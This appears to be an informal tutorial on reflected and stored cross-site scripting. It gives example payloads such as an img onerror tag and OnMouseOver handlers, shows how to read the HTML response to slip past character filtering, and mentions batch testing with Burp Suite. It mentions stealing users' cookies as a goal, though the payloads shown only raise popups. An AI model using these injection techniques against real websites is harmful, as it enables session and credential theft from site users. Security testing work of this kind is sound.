xss ( Cross site scripting ) one of the vulnerabilities in most of the websites that working on java script today. This methodology will originate from the client side to the server. The attacker who is also a user of a certain webpage will execute this cross site scripting technique. The way the attacker approach the website is in a random manner.
There is no selective target from attacker’s point of view. The xss injection mainly focuses the unhealthy java script with which the attacker can execute the malicious script in the users browser. These malicious scripts are called payloads.
Requirements for xss injection:
1. An input field such as a submission, contact form or a login column.
2.common xss payloads with xmlhttp request or plain java or html codes in it.
3.A browser with no xss filters, better to go with firefox and chrome is not recommendable as it contains some default xss filters which is also not fully secured.
Guidance for injection procedure:
Is end users deal any problem with reflected xss?
Obviously, the answer is yes. Because if the payload got executed perfectly with no interruption then it is easy to execute those payloads in the users browser and so we can capture their cookies such as user name and passwords. And it is not users responsibility to stay away from the xss attack and the problem is actually on the webpage and the browser side.
What if the random payload is not executed successfully…?
In most cases these random payloads will only give chance of reflected xss. But you can manipulate your script in order to make it as a successful injection.
This scenario includes the analyzation of the html response. First, inject the payload in the field and wait for the response, if the xss doesn’t got triggered move on with the html response for the payload that you have inserted. For example, in this case i am entering a normal payload
“><img src=x onerror=prompt(document.domain)>
And the html response was:
<input type=”text” id=”*” name=”*” value=””><img img” class=”form-control” rel=”gp” data-size=”20″ data-character-set=”a-z,A-Z,0-9″>
From this we can understand that some of the specific characters such as < and ” are not filtered properly and they got reflected in the response. So, to carry over this advantage.
xss can also be done with adding some HTML attributes ….so if i execute this payload,
The HTML response was:
<input type=”text” id=”*” name=”*” value=”” OnMouseOver=prompt(” class=”form-control” rel=”gp” data-size=”20″ data-character-set=”a-z,A-Z,0-9″>
In this response the brackets () are getting filtered… So after removing the bracket in the payload the response will be….
<input type=”text” id=”*” name=”*” value=”” OnMouseOver=prompt`1`” class=”form-control” rel=”gp” data-size=”20″ data-character-set=”a-z,A-Z,0-9″>
And adding a double quote after equal to the response will be:
<input type=”text” id=”ipn_secret_keygen” name=”ipn_secret_keygen” value=””OnMouseOver=”alert`1`” class=”form-control” rel=”gp” data-size=”20″ data-character-set=”a-z,A-Z,0-9″>
Looks good . And now i click on the webpage and finally a pop up is appeared as a result of stored xss.
Payload and response credits : Medium
It is an alternative method for checking for xss with your payloads one by one. you can check for xss with more number of payloads at the same time. Get your burpsuite started and capture the request of the web page , then detect the input field . Add the field to the interceptor . select your payload and load it. and then forward the request. The tool will execute the injection and show the response on the attacking interface. find the payload with more length and inject in to the webpage and analyse the result.